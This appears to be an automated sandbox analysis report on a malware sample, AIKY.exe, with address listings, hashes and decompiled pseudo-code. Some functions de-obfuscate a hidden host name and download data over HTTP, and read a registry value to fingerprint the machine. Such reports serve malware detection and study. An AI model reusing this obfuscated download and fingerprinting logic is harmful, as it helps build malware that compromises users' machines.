0x00b60f9f
0x00b60fa9
0x00b60fb0
0x00b60fb6
0x00b60fba
0x00b60fbf
0x00b60fc4
0x00b60fdb
0x00b60fe0
0x00b60ff6
0x00b60fe2
0x00b60fe2
0x00b60fe5
0x00b60fe5
0x00b60fe7
0x00b60fe8
0x00b60ff1
0x00b60ff1
0x00b60ffd
0x00b60fff
0x00b61000
0x00b61003
0x00b61004
0x00b61009
0x00b6100b
0x00b6100d
0x00b6100d
0x00b61010
0x00b61010
0x00b61012
0x00b61013
0x00b61019
0x00b6101d
0x00b6101f
0x00b61021
0x00b61025
0x00b61025
0x00b6102d
0x00b61031
0x00b6103e
0x00b61040
0x00b61043
0x00b61045
0x00b61045
0x00b61047
0x00b6104a
0x00b6104a
0x00b6104c
0x00b6104d
0x00b61054
0x00b61056
0x00b6105b
0x00b6105b
0x00b61061
0x00b61063
0x00b61065
0x00b61077
0x00b6107d
0x00b61080
0x00b61080
0x00b61082
0x00b61083
0x00b6108d
0x00b61092
0x00000000
0x00000000
0x00000000
0x00b61092
0x00b61065
0x00b61094
0x00b61094
0x00b61096
0x00b61099
0x00b6109b
0x00b610cc
0x00b610a0
0x00b610a0
0x00b610a3
0x00b610a6
0x00b610a6
0x00b610a8
0x00b610a9
0x00b610af
0x00b610b5
0x00b610ba
0x00b610bf
0x00b61108
0x00b6110c
0x00b610c1
0x00b610c4
0x00b610c7
0x00b610ca
0x00000000
0x00b610ca
0x00b610db
0x00b610de
0x00b610e6
0x00b610ec
0x00b61110
0x00b61113
0x00b61117
0x00b61136
0x00b61119
0x00b6111e
0x00b61123
0x00b61126
0x00b6112c
0x00b6112e
0x00b61131
0x00b61131
0x00b6113c
0x00b6117d
0x00b61143
0x00b61148
0x00b6114d
0x00000000
0x00b61153
0x00b61153
0x00b61156
0x00b6115b
0x00b6115e
0x00b6115e
0x00b61160
0x00b61161
0x00b61168
0x00b6116e
0x00b61170
0x00b61172
0x00b61175
0x00b61178
0x00b6117b
0x00000000
0x00b6117b
0x00000000
0x00b6114d
0x00b61184
0x00b611ca
0x00b611cc
0x00b611ce
0x00b611d1
0x00b611d1
0x00b611d5
0x00b611d8
0x00b611da
0x00000000
0x00b61186
0x00b6118e
0x00b61193
0x00b61198
0x00000000
0x00b6119a
0x00b611a3
0x00b611a8
0x00b611ad
0x00000000
0x00b611af
0x00b611b2
0x00b611c7
0x00b611c7
0x00000000
0x00b611b4
0x00b611bb
0x00b611c0
0x00b611c5
0x00000000
0x00000000
0x00000000
0x00000000
0x00b611c5
0x00b611b2
0x00b611ad
0x00b61198
0x00b610ee
0x00b610f0
0x00b610f6
0x00b610fd
0x00b610fe
0x00b611dc
0x00b611de
0x00000000
0x00b611e3
0x00000000
0x00b610ec
0x00b610d5
0x00b610d8
0x00000000
0x00b61033
0x00b61035
0x00b611e4
0x00b611e5
0x00000000
0x00b611ec
0x00b60fc6
0x00b60fc9
0x00b61207
0x00b61207
0x00b61209
0x00b6120b
0x00b6120d
0x00b6120f
0x00b61211
0x00b61216
0x00b61219
0x00b6121c
0x00b6121d
0x00b6121e
0x00b61222
0x00b61228
0x00b61234
0x00b61243
0x00b61246
0x00b61249
0x00b6124a
0x00b6124d
0x00b61256
0x00b61274
0x00b6127c
0x00b6127e
0x00b61284
0x00b61258
0x00b6125b
0x00b61263
0x00b61268
0x00b61268
0x00b61236
0x00b61239
0x00b6123e
0x00b6123e
0x00b61291
0x00b60fcf
0x00b60fd4
0x00b611ed
0x00b611f0
0x00000000
0x00b611f6
0x00b60fc9
0x00b60f8d
0x00b611f8
0x00b61206
0x00b61206
0x00b60f8b
0x00b60ee4
0x00b60ee6
0x00b60eec
0x00b60ef1
0x00b60ef3
0x00b60ef4
0x00b60f49
0x00b60f4b
0x00b60f59
0x00b60f59
0x00000000

APIs

__dosmaperr.LIBCMT ref: 00B60EE6
_free.LIBCMT ref: 00B60F4B

Strings

SystemRoot, xrefs: 00B61186, 00B61189

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __dosmaperr_free
String ID: SystemRoot
API String ID: 3116789124-2034820756
Opcode ID: c8b369580d53fd65dd281d0dd8e4419220c09d90f2df5f5e5e3bce52fca0d609
Instruction ID: 63fd548896a0a87d38d0641abb7c23be96aae393908c755745750a139fa890b4
Opcode Fuzzy Hash: c8b369580d53fd65dd281d0dd8e4419220c09d90f2df5f5e5e3bce52fca0d609
Instruction Fuzzy Hash: 0F213532A05215AFEB14EF6AC890BAAB7E8EF42325F2440EDFC48DB341D676DD018750

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AIKY.exe PID: 5044 Parent PID: 1104 AIKY.exeCOMMON

Executed Functions

Function 00B487BF, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 169
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B487BF(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp) {
				signed int _v4;
				char _v26;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v52;
				char _v76;
				char _v80;
				void* _v92;
				char _v113;
				char _v116;
				void* _v120;
				void* _v124;
				long _v140;
				void _v152;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _t52;
				void* _t55;
				void* _t61;
				char* _t64;
				void* _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				signed int _t82;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t91;
				char _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t104;
				signed int _t107;

				_t52 =  *0xb69014; // 0xce6f0fb5
				_v4 = _t52 ^ _t107;
				_t104 = __ecx;
				_t82 = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t55 = InternetOpenA(0, 0, 0, 0, 0); // executed
				_t101 = _t55;
				_v52 = _t101;
				if(_t101 != 0) {
					_v40 = 0x21362e22;
					_v36 = 0x693c3c2b;
					_v32 = 0x22262727;
					_v28 = 0x2822;
					_v26 = 0;
					_t61 = InternetConnectA(_t101, E00B427F5( &_v40), 0x50, 0, 0, 3, 0, 0); // executed
					_v92 = _t61;
					if(_t61 != 0) {
						_t96 = 0;
						if( *__ecx == 0) {
							_v116 = 0x160407;
							_t88 = 0;
							do {
								_t15 = _t88 + 0x40; // 0x40
								 *(_t107 + _t88 + 0x10) =  *(_t107 + _t88 + 0x10) ^ _t15;
								_t88 = _t88 + 1;
							} while (_t88 < 3);
							_v113 = 0;
							_t64 =  &_v116;
						} else {
							_v80 = 0x17110e10;
							_v76 = 0;
							_t64 = E00B432BE( &_v80);
							_t96 = 0;
						}
						_t65 = HttpOpenRequestA(_v92, _t64,  *(_t104 + 0xc), _t96, _t96, _t96, 0x84680100, _t96); // executed
						_t102 = _t65;
						if(_t102 != 0) {
							if(HttpSendRequestA(_t102, 0, 0,  *(_t104 + 0x10),  *(_t104 + 0x14)) != 0) {
								_v152 = _v152 & _t82;
								_v140 = 4;
								HttpQueryInfoA(_t102, 0x20000013,  &_v152,  &_v140, 0);
								if(_v172 == 0xc8) {
									_push(0x400a);
									_t83 = E00B509A2();
									_v184 = 0x400a;
									_v180 = 0;
									if(_t83 == 0) {
										_t82 = 0;
									} else {
										_v176 = 1;
										_push( &_v168);
										_push(0x400a);
										_push(_t83);
										while(InternetReadFile(_t102, ??, ??, ??) != 0) {
											_t98 = _v184;
											_t76 = _v196;
											if(_t98 == 0) {
												 *((char*)(_t76 + _t83)) = 0;
												 *((intOrPtr*)(_t104 + 0x18)) = _t83;
												_t82 = _v192;
												 *((intOrPtr*)(_t104 + 0x1c)) = _t76;
											} else {
												_t77 = _t76 + _t98;
												_t91 = _v200 - _t98;
												_v196 = _t77;
												_v200 = _t91;
												if(_t91 != 0) {
													L16:
													_push( &_v184);
													_push(_t91);
													_push(_t77 + _t83);
													continue;
												} else {
													_v200 = 0x400a;
													_push(_t77 + 0x400a);
													_push(_t83);
													_t83 = E00B5294D();
													if(_t83 == 0) {
														break;
													} else {
														_t77 = _v196;
														_t91 = _v200;
														goto L16;
													}
												}
											}
											goto L21;
										}
										_t82 = 0;
									}
								}
							}
							L21:
							InternetCloseHandle(_t102); // executed
						}
						InternetCloseHandle(_v124);
						_t101 = _v120;
					}
					InternetCloseHandle(_t101);
				}
				InternetCloseHandle(_t101);
				return E00B4AE43(_v28 ^ _t107);
			}

0x00b487c2
0x00b487c9
0x00b487d2
0x00b487da
0x00b487dc
0x00b487df
0x00b487eb
0x00b487ed
0x00b487f3
0x00b487fb
0x00b4880f
0x00b48817
0x00b4881f
0x00b48826
0x00b48831
0x00b48837
0x00b4883d
0x00b48843
0x00b48847
0x00b48862
0x00b4886a
0x00b4886c
0x00b4886c
0x00b4886f
0x00b48873
0x00b48874
0x00b48879
0x00b4887d
0x00b48849
0x00b4884d
0x00b48855
0x00b48859
0x00b4885e
0x00b4885e
0x00b48892
0x00b48898
0x00b4889c
0x00b488b5
0x00b488bb
0x00b488ca
0x00b488d9
0x00b488e7
0x00b488ed
0x00b488f7
0x00b48900
0x00b48904
0x00b4890b
0x00b48988
0x00b4890d
0x00b48911
0x00b48919
0x00b4891a
0x00b4891b
0x00b48969
0x00b4891e
0x00b48922
0x00b48928
0x00b48978
0x00b4897c
0x00b4897f
0x00b48983
0x00b4892a
0x00b4892e
0x00b48930
0x00b48932
0x00b48936
0x00b4893c
0x00b48960
0x00b48966
0x00b48967
0x00b48968
0x00000000
0x00b4893e
0x00b48945
0x00b48949
0x00b4894a
0x00b48950
0x00b48956
0x00000000
0x00b48958
0x00b48958
0x00b4895c
0x00000000
0x00b4895c
0x00b48956
0x00b4893c
0x00000000
0x00b48928
0x00b48974
0x00b48974
0x00b4890b
0x00b488e7
0x00b4898a
0x00b4898b
0x00b4898b
0x00b48991
0x00b48993
0x00b48993
0x00b48998
0x00b48998
0x00b4899b
0x00b489b1

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B487DF
InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00B48831
HttpOpenRequestA.WININET(?,00160407,?,00000000,00000000,00000000,84680100,00000000), ref: 00B48892
HttpSendRequestA.WININET(00000000,00000000,00000000,242C2830,?), ref: 00B488AD
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00B488D9
InternetReadFile.WININET(00000000,00000000,0000400A,?), ref: 00B4896A
InternetCloseHandle.WININET(00000000), ref: 00B4898B
InternetCloseHandle.WININET(?), ref: 00B48991
InternetCloseHandle.WININET(00000000), ref: 00B48998
InternetCloseHandle.WININET(00000000), ref: 00B4899B

Strings

".6!, xrefs: 00B487FB
+<<i, xrefs: 00B4880F
''&", xrefs: 00B48817
"(, xrefs: 00B4881F

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Http$OpenRequest$ConnectFileInfoQueryReadSend
String ID: "($".6!$''&"$+<<i
API String ID: 379955058-275990164
Opcode ID: eb1c54be6ad96fc11016bdb8b05b6e8b508796864adea786288afb28e1864e07
Instruction ID: fc02c2f10aca86be7bbf6c702c170cdb72cda605eed35b4d55aad03e7ae1a498
Opcode Fuzzy Hash: eb1c54be6ad96fc11016bdb8b05b6e8b508796864adea786288afb28e1864e07
Instruction Fuzzy Hash: 8A519CB1208302AFE714CF25DC80A3FBBE9EBD9704F04496DF58196251EB70DA099B63

Uniqueness

Uniqueness Score: -1.00%

Function 00B61E73, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B61E73(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E00B61BBB(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00B5B06B(_t188, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E00B61B26(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00B5AFB4(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00B618D1(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0xb6a6c8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00B61B26();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0xb6a6c8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00B55B87(GetLastError());
											 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00B5B174( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00B61D37(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00B58BA1(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00B55B87(_t271);
							 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00B55BBD())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0xb6a6c8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00B55B87(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00B61B26();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00B55BAA()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00B55BBD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00B55BAA()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00B55BBD()));
				}
			}

APIs

Part of subcall function 00B61B26: CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

GetLastError.KERNEL32 ref: 00B61F87
__dosmaperr.LIBCMT ref: 00B61F8E
GetFileType.KERNELBASE(00000000), ref: 00B61F9A
GetLastError.KERNEL32 ref: 00B61FA4
__dosmaperr.LIBCMT ref: 00B61FAD
CloseHandle.KERNEL32(00000000), ref: 00B61FCD
CloseHandle.KERNEL32(00B5892B), ref: 00B6211A
GetLastError.KERNEL32 ref: 00B6214C
__dosmaperr.LIBCMT ref: 00B62153

Strings

H, xrefs: 00B620D8

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction ID: c5956d696b5896422852ae79306637db79c955fd15a45aa975bf40feba647256
Opcode Fuzzy Hash: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction Fuzzy Hash: FFA13532A045448FDF29DF68DC92BAD3BE0EB06325F1801D9EC11AB2E1DB798C06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A313, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B4A313(void* __ebx, void* __esi, CHAR* _a4) {
				signed int _v12;
				char _v247;
				char _v249;
				char _v253;
				char _v254;
				char _v258;
				char _v259;
				char _v263;
				char _v264;
				char _v272;
				char _v274;
				short _v276;
				intOrPtr _v280;
				char _v284;
				char _v285;
				char _v316;
				void* _v320;
				int _v324;
				signed int _t35;
				long _t40;
				long _t45;
				int* _t58;
				CHAR* _t64;
				signed int _t66;

				_t35 =  *0xb69014; // 0xce6f0fb5
				_v12 = _t35 ^ _t66;
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x138], xmm0");
				asm("movaps xmm0, [0xb3dac0]");
				_t58 = 0;
				_t64 = _a4;
				asm("movups [ebp-0x128], xmm0");
				do {
					_t3 = _t58 + 0x40; // 0x40
					 *(_t66 + _t58 - 0x138) =  *(_t66 + _t58 - 0x138) ^ _t3;
					_t58 = _t58 + 1;
				} while (_t58 < 0x1f);
				_v285 = 0;
				_t40 = RegOpenKeyExA(0x80000002,  &_v316, 0, 0x20119,  &_v320); // executed
				if(_t40 == 0) {
					_v324 = 0x100;
					_v284 = 0x2b21200d;
					_v280 = 0x232b2d;
					_v276 = 0x2e203d;
					_t45 = RegQueryValueExA(_v320, E00B427DA( &_v284), 0, 0,  &_v272,  &_v324); // executed
					if(_t45 == 0) {
						_push(_v247);
						_v264 = 0;
						_push( &_v253);
						_v259 = 0;
						_push( &_v258);
						_v254 = 0;
						_push( &_v263);
						_v249 = 0;
						_push( &_v272);
						_v284 = 0x30673265;
						_v280 = 0x34633661;
						_v276 = 0x2a6d;
						_v274 = 0;
						wsprintfA(_t64, E00B4282B( &_v284));
						CharUpperBuffA(_t64, 0x17); // executed
					}
					RegCloseKey(_v320); // executed
				}
				return E00B4AE43(_v12 ^ _t66);
			}

0x00b4a31c
0x00b4a323
0x00b4a326
0x00b4a32e
0x00b4a337
0x00b4a33e
0x00b4a341
0x00b4a344
0x00b4a34b
0x00b4a34b
0x00b4a34e
0x00b4a355
0x00b4a356
0x00b4a361
0x00b4a37a
0x00b4a382
0x00b4a38e
0x00b4a39f
0x00b4a3b2
0x00b4a3bc
0x00b4a3d2
0x00b4a3da
0x00b4a3e9
0x00b4a3f0
0x00b4a3f6
0x00b4a3fd
0x00b4a403
0x00b4a40a
0x00b4a410
0x00b4a417
0x00b4a41d
0x00b4a41e
0x00b4a428
0x00b4a432
0x00b4a43b
0x00b4a448
0x00b4a454
0x00b4a454
0x00b4a460
0x00b4a460
0x00b4a473

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020119,?,00000000,00000000), ref: 00B4A37A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00B4A3D2
wsprintfA.USER32 ref: 00B4A448
CharUpperBuffA.USER32(?,00000017), ref: 00B4A454
RegCloseKey.KERNELBASE(?), ref: 00B4A460

Strings

a6c4, xrefs: 00B4A428
= ., xrefs: 00B4A3BC
e2g0, xrefs: 00B4A41E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharCloseOpenQueryUpperValuewsprintf
String ID: = .$a6c4$e2g0
API String ID: 4023059497-4218468681
Opcode ID: 1dabf1a4e9828893c286776e9ecf1896c181c702632920ef485111b01d4c4e2e
Instruction ID: 1350593dab1eedc7fce22edc0a84e1ec3e302e11a023b76af5983642f2028b1b
Opcode Fuzzy Hash: 1dabf1a4e9828893c286776e9ecf1896c181c702632920ef485111b01d4c4e2e
Instruction Fuzzy Hash: 1031707094426C9ADB21DF24DC91BEDFBBCAF19304F0041E9E549A3151EA705BD8DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B57A53, Relevance: 13.8, APIs: 9, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B57A53(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				signed char _t148;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(_t198 < 0) {
						L59:
						_t137 = E00B55BAA();
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00B55BBD())) = 9;
						L60:
						_t139 = E00B528EC();
						goto L61;
					}
					__eflags = _t198 -  *0xb6a8c8; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xb6a6c8 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if((1 & _t224) == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(_t210 <= 0x7fffffff) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							_t148 =  !_t210;
							__eflags = _t148 & 0x00000001;
							if((_t148 & 0x00000001) == 0) {
								L14:
								 *(E00B55BAA()) =  *_t149 & _t240;
								 *((intOrPtr*)(E00B55BBD())) = 0x16;
								E00B528EC();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00B56F1C(_t154);
								E00B564B8(0);
								E00B564B8(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(_t240 != 0) {
									_t158 = E00B572D3(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
